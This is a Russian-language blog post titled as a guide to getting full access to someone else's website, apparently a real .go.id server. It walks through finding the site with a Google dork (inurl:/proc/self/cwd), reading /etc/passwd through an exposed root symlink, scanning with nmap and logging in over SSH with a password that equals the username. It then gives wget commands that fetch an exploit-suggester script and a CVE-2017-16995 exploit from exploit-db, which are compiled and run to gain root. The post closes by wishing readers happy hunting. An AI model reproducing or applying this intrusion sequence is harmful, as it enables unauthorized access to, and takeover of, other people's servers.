Получаем полный доступ к чужому сайту
С помощью Google Dork's и эксплойтов
Всем салют, дорогие друзья!
Для обычного пользователя, Google — это просто поисковая система, используемая для поиска текста, изображений, видео и новостей. Однако, возможности гугла поистине впечатляют, на самом деле найти можно все, что душе угодно, в том числе и уязвимые сайты.
Кстати! Специально для вас мы нашли уязвимый сайт, что бы показать вам все на реальном примере.
Итак, Google Dork, также известный как Google Dorking или Google Hacking, является ценным инструментом для хакера. Он содержит собственный встроенный язык запросов, так называемые "Операторы Google Dork" или, попросту говоря - "Дорки".
Оператор "inurl:
" используется для получения результатов, URL-адрес которых содержит только одно ключевое слово, например, inurl: admin
С помощью Google Dork и оператора inurl: /proc/self/cwd
нами и был обнаружен уязвимый сайт, который содержал ссылку, ведущую прямо в корневой каталог сервера:
Данная уязвимость заключается в том, что в каталоге сайта содержится символическая ссылка (symlink), которая ведёт в сам корневой каталог (/
).
Получение информации о пользователях Linux
Итак, как только мы зашли в корневой каталог сервера, необходимо узнать информацию о пользователях, которые существуют в системе. Они содержатся по пути /etc/passwd
и /etc/shadow
. Нам нужен файл passwd, так как файл shadow попросту недоступен для обычного пользователя.
Имена обычных пользователей могут начинаться с идентификатора 1000. А вот пользователь kajari - именно тот, кто нам нужен.
Проверка на наличие открытого порта сервиса OpenSSH
Теперь с помощью инструмента Nmap мы просканируем сервер на наличие открытых портов.
nmap site.go.id
Вход по SSH
- Подключимся к серверу по SSH от имени kajari и недолго думая, попытаемся ввести банальный пароль, а именно само имя пользователя (kajari) и-и...
Так как версия Ubuntu и ядро Linux старые - воспользуемся скриптом "Linux Exploit Suggester" из репозитория GitHub. Он позволяет обнаружить проблемы с безопасностью машины с ядром Linux, а так же предоставляет ссылки на эксплоиты для данных уязвимостей.
Скачивание скрипта и поиск уязвимостей
wget -O search.sh https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x search.sh
./search.sh
Скрипт вывел список с 4-мя уязвимостями. Более вероятная уязвимость — это CVE-2017-16995, именно ею мы и воспользуемся.
Скачивание, компиляция и запуск эксплойта
wget -O exploit_code.c https://www.exploit-db.com/download/45010
gcc -o exploit exploit_code.c
chmod +x exploit ./exploit
Мы получили root доступ и можем делать с сайтом и сервером все, что душе угодно. Об этом свидетельствует вывод команды whoami и приглашение к вводу (#).
На сегодня это все. Удачной охоты!